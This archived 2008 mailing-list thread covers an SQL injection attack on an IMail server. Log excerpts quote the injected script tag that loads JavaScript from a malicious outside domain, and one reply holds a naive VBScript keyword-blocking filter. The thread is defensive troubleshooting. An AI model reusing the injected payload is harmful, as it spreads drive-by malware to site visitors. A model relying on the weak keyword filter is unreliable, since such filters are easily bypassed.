Re: [IMail Forum] Coldwop

Sun, 22 Jun 2008 12:04:07 -0700 

Kevin,
Trust me when I say, "been there, done that". Don't do it. This guy will come back and he has more than one trick up his sleve that will require you to be perfect. 

The process is primarily three steps (mostly echoing Darin):

   1) Do something like CInt to all integers (or other change-to
   numerical data functions) for anything that is stored as a number
   (not a string) in the database.

   2) Escape every single quote with a double single quote for any
   string data going to the database through the query.

   3) For instances such as ORDER BY [column name] and SELECT FROM
   [table name] where you are pulling values from the querystring, you
   must validate that these values are one of the values that you are
   expecting by using a long IF statement or something like that.  So
   if you only have columns named Height, Width, Length, you must check
   that the querystring data only contains one of the three.  You could
   probably also write a function that checks the data in regex and
   verifies that there are no non-alphanumeric characters including
   spaces.  This sort of technique would only work for things like
   ORDER BY, SELECT FROM and don't forget to check values like ASC and
   DESC if you do that sort of thing from the querystring also.


Matt



Kevin Rogers wrote:



Thanks for the advice.  Yes, we are running a site that does allow 
access to certain portions of the database, so I'm assuming we got hit 
from that side.  We'll see.  We've added a function to catch the 
injectors to all our web pages in an include file.  Just wondering if 
this would suffice.  (If the function does match, we aren't currently 
doing anything - just ending the page - do you have any suggestions in 
that regard as well?)


pr_ValidateInputAll

function pr_ValidateInputAll()
   dim prReqName
   dim arToCompare
   redim arToCompare(2)
   arToCompare(0) = "drop"
   arToCompare(1) = "delete"
   arToCompare(2) = "update"
   for each prReqName in Request.Form
       pr_ValidateInput Request.Form(prReqName), arToCompare
   next

   for each prReqName in Request.QueryString
       pr_ValidateInput Request.QueryString(prReqName), arToCompare
   next

end function

function pr_ValidateInput(sInput, arToCompare)
   dim nLen, nPos1, nPos2
          nLen = len(sInput)
   if nLen > 15 then
              if Instr(1, sInput, "VARCHAR", 1) > 0 then

           Response.End        end if                  for i = 
lbound(arToCompare) to UBound(arToCompare)                      nPos1 
= InStr(1, sInput, arToCompare(i), 1)

                      if nPos1 > 0 then

               nPos2 = InStr(nPos1 + 1, sInput, "table", 1)         
               if nPos2 > 0 and nPos2 > nPos1  then
                   response.End                end if          
           end if

       next
   end if
end function



Darin Cox wrote:

Best way to find out is to grep all of your web server logs for 
something like "VARCHAR(".  That will tell you what pages are being 
attacked.



After that, you'll have to check the source code of the individual 
pages to see if they are vulnerable, and take appropriate steps to 
patch them (quickly).


Darin.


----- Original Message ----- From: "Matt" <[EMAIL PROTECTED]>
To: <[email protected]>
Sent: Saturday, June 21, 2008 7:06 PM
Subject: Re: [IMail Forum] Coldwop


Oops, I misread this.

You were hacked using SQL injection from the Web side of things.  I'm
not sure what interface was hit, but it could be that webmail is
vulnerable to this.  There's a bunch on SANS about these attacks:



http://www.google.com/search?sourceid=mozclient&ie=utf-8&oe=utf-8&q=sql+injection+site%3Aisc%2Esans%2Eorg 



My guess is that this is Storm Botnet originated stuff.  They hack sites
through a very common coding vulnerability in database connected
websites, insert redirection code to an infected site, and when
unsuspecting users visit the intended site, they get infected by means
of one of many vulnerabilities in desktop apps that they target.

Your logs are showing the aftermath of having the bad data in there.
This will continue to happen over and over again until you patch
whatever is vulnerable.  You either have some sort of custom site set up
that has access to this particular database, or it was hacked straight
through IMail's Web interfaces.  I would love to know which one.

Matt



Kevin Rogers wrote:

 

Thanks Matt.  I use an external SQL Server for Imail and all my users
had their USERDIR and MAILADDR and TIMEZONE fields changed to include
that coldwop.com javascript (e.g., "someuser" had their USERDIR set to
"d:\imail\someuser<script src=http://www.coldwop.com/b.js></script>")

I've fixed that.  So what you're saying is that you don't think any
passwords have been compromised, but I've just been hit by the SQL
injector attacker?


Matt wrote:

   

This looks exactly like the SQL injection attacker from recent months
is trying to exploit a Postfix flaw by injecting into IMAP
interfaces.  If this is causing you problems, it would seem that
IMail then isn't properly handling this bad data resulting in a
denial of service, though I strongly suspect that you are not
vulnerable otherwise.  It could also be simply curious timing with
two different issues.

Matt



Kevin Rogers wrote:

     

Today our web mail application stopped working.  Some users are
reporting IMAP issues as well.  I've restarted all the services and
rebooted, but that hasn't helped.  The error when entering web mail
is that there is an "illegal character in the path".  When I checked
the syslog, I found thousands of entries like this:
06:21 12:18 SMTP-(4722016d00006d72) ERR MyDomain.com read open fail
(d:\imail\RBG\myuser<script
src=http://www.coldwop.com/b.js></script>\bulk.mbx)
06:21 12:18 SMTP-(46ed01d600006d40) ERR MyDomain.com read open fail
(d:\imail\RBG\myuser<script
src=http://www.coldwop.com/b.js></script>\main.mbx)

Coldwop.com apparently is a malicious site (my Trend Micro won't
even let me go there).  Have I been hacked by them?

Anyone seen this?
I'm running Imail 9.23 on Windows Server 2003, all patches.
Thanks for your help.

Kevin

To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html


        

To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html



      

To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html


    



To Unsubscribe: http://imailserver.com/support/discussion_list/

List Archive: 
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/

Knowledge Base/FAQ: http://imailserver.com/support/kb.html


To Unsubscribe: http://imailserver.com/support/discussion_list/

List Archive: 
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/

Knowledge Base/FAQ: http://imailserver.com/support/kb.html



  


To Unsubscribe: http://imailserver.com/support/discussion_list/

List Archive: 
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/

Knowledge Base/FAQ: http://imailserver.com/support/kb.html























					Reply via email to